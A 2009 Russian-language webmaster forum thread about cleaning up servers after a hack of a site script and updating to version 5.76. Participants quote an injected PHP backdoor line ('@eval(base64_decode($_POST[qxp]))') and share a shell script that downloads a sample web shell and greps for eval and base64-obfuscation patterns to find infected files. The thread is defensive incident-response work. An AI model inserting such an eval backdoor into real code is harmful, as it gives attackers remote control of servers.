С нами с 16.07.04
Сообщения: 678
Рейтинг: 702
|
 Добавлено: 09/10/09 в 08:04 |
version 5.76 released Обновляемся...
|
|
|
|
| |
Клева
С нами с 07.02.04
Сообщения: 12781
Рейтинг: 3531
|
| Добавлено: 09/10/09 в 09:26 |
Ага оперативно новую версии сделали, обновление уже часов 5 как доступно
|
|
|
|
| |
С нами с 15.12.05
Сообщения: 287
Рейтинг: 293
|
| Добавлено: 09/10/09 в 09:36 |
кто-нибудь может потестить, возможен ли этот же хак на новой версии с дефолными секьюрными настройками (после запуска secure.php) ?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 10:07 |
проверил, старый запрос не работает, так что можно обновляться.
но они кодировщика с зенда на ионкуб поменяли, пока ле получается посмотреть что они поменяли.
|
|
|
|
| |
С нами с 15.12.05
Сообщения: 287
Рейтинг: 293
|
| Добавлено: 09/10/09 в 10:22 |
ясно, спасибо
Обновился я сразу, просто хотелось знать, нужно ли дополнительные степени защиты вводить )
|
|
|
|
| |
awmstats crew
С нами с 27.02.03
Сообщения: 2559
Рейтинг: 1182
|
| Добавлено: 09/10/09 в 13:42 |
обновился, но попрежнему gallery.php - unknown file, других следов взлома небыло. это нормально ?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 13:47 |
удали этот файл, он был в пакете смарта года 2 назад, и уже давно не нужен
|
|
|
|
| |
С нами с 07.07.07
Сообщения: 98
Рейтинг: 56
|
| Добавлено: 09/10/09 в 13:48 |
стер файлы в папке /thumbs, удалил несвоего юзера в st и в базе, стер файлы в /tmp, обновил до новой версии st, залочил ее,
стираю в variables.php @eval(base64_decode($_POST[qxp]));//'; но при сохранении general settings, строчка снова появляется.
она сама по себе может навредить? если да, то как с этим справиться?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 13:58 |
есть access_log веб-сервера?
если чтрочка появляется значит у тебя уязвимость осталась, или остались на сервере файлы с php-shell'ом
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 14:18 |
+1 eval опять появляется после сохранения general settings.
в /thumbs/ php файлы отсутствуют.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 14:24 |
| Код: |
cd /home/httpd [заменить на дир с контентом доменов]
wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'
for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done
find /home/httpd/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \; [заменить на дир с контентом доменов]
|
сделай плс и вывод скинь
|
|
|
|
| |
С нами с 01.02.07
Сообщения: 231
Рейтинг: 294
|
| Добавлено: 09/10/09 в 14:36 |
| Soft-Com писал: | проверил, старый запрос не работает, так что можно обновляться.
|
Подтверждаю, старый не работает.
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 14:45 |
[root@ /home/.../domain.com/public_html]# ./fin.sh
diff: ./gals/gal1/p2.php_files/st_bd.php: No such file or directory
find: -exec: no terminating ";" or "+"
[root@ /home/.../domain.com/public_html]#
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 14:49 |
| MadDok писал: |
[root@ /home/.../domain.com/public_html]# ./fin.sh
diff: ./gals/gal1/p2.php_files/st_bd.php: No such file or directory
find: -exec: no terminating ";" or "+"
[root@ /home/.../domain.com/public_html]#
|
ошибки в самом скрипте
скинь сюда код
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 14:50 |
| Код: | cd /home/.../domain.com/public_html/
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'
for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done
find /home/.../domain.com/public_html/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \ |
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 14:56 |
что-то ты не то скопировал
1. wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php - пример шелла, он 90% такой же как у тебя
2. {} \ - тут нехватает ";" - должно быть
{} \;
предыдущий пост мой прочитай внимательно
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 14:58 |
так я шел с твоего сайта скопировал, просто в fin.sh не вставил команду копирования, ибо зачем еще раз его копировать то? ;) №2 сейчас сделаю.
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 15:03 |
теперь говорит:
| Код: | [root@ /home/.../domain.com/public_html]# ./fin.sh
diff: ./gals/gal1/p2.php_files/st_bd.php: No such file or directory
[root@ /home/.../domain.com/public_html]#
|
код fin.sh
| Код: | wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
cd /home/.../domain.com/public_html/
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'
for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done
find /home/.../domain.com/public_html/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \; |
Последний раз редактировалось: MadDok (09/10/09 в 15:06), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 07.07.07
Сообщения: 98
Рейтинг: 56
|
| Добавлено: 09/10/09 в 15:06 |
| Цитата: | есть access_log веб-сервера?
если чтрочка появляется значит у тебя уязвимость осталась, или остались на сервере файлы с php-shell'ом. |
не понял, о какой строчке идет речь? у меня есть access_log апача и access.log nginx'a - что нужно посмотреть?
| Код: | cd /home/httpd [заменить на дир с контентом доменов]
wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'
for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done
find /home/httpd/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \; [заменить на дир с контентом доменов] |
никаких результатов не выводит.
|
|
|
|
| |
С нами с 07.07.07
Сообщения: 98
Рейтинг: 56
|
| Добавлено: 09/10/09 в 15:12 |
... и снова появился sess файл в /tmp. что делать? 
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 15:15 |
sess это сессии.
|
|
|
|
| |
С нами с 07.07.07
Сообщения: 98
Рейтинг: 56
|
| Добавлено: 09/10/09 в 15:19 |
MadDok: ну а ты справился со своей вирей? если да, то как?
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 15:21 |
yo: нет, жду что софт-ком ответит. Просто пока на все variables.php стоит доступ только для чтения.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 16:35 |
YO:
файлы взломщиков - *ses.tmp (хз, может они форумы читают, уже как минимум в 3х форумах идёт активное обсуждение и таблетки, так что и поменять могли)
MadDok:
diff: ./gals/gal1/p2.php_files/st_bd.php: - нет файла, котырй должен быть вытянут вгетом, у тебя ошибка в скрипте
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 09/10/09 в 16:37 |
Soft-Com: а где именно ошибка? Я же тебе код полный вставил.
|
|
|
|
| |
